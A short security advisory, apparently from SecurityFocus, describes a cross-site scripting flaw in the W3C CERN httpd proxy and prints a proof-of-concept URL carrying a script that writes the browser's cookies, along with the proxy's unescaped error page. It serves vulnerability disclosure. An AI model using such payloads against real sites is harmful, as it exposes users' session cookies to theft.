W3C CERN httpd Proxy Cross-Site Scripting Vulnerability

"TAKAGI, Hiromitsu" <takagi.hiromitsu@aist.go.jp> submitted this example:

Accessing the following URL with the browser configured to use CERN httpd as a proxy,

http://nonexistenthost.google.com/<SCRIPT>document.write(document.cookie)</SCRIPT>

will cause CERN httpd Proxy to produce output like this:
========================================================
<HTML>
<HEAD>
<TITLE>Error Message</TITLE>
</HEAD>
<BODY>
<H1>Fatal Error 500</H1>
Can't Access Document: http://nonexistenthost.google.com/<SCRIPT>document.write(document.cookie)</SCRIPT>.
<P>
<B>Reason:</B> Can't locate remote host: nonexistenthost.google.com.
<P>
...
========================================================


 

Privacy Statement
Copyright 2010, SecurityFocus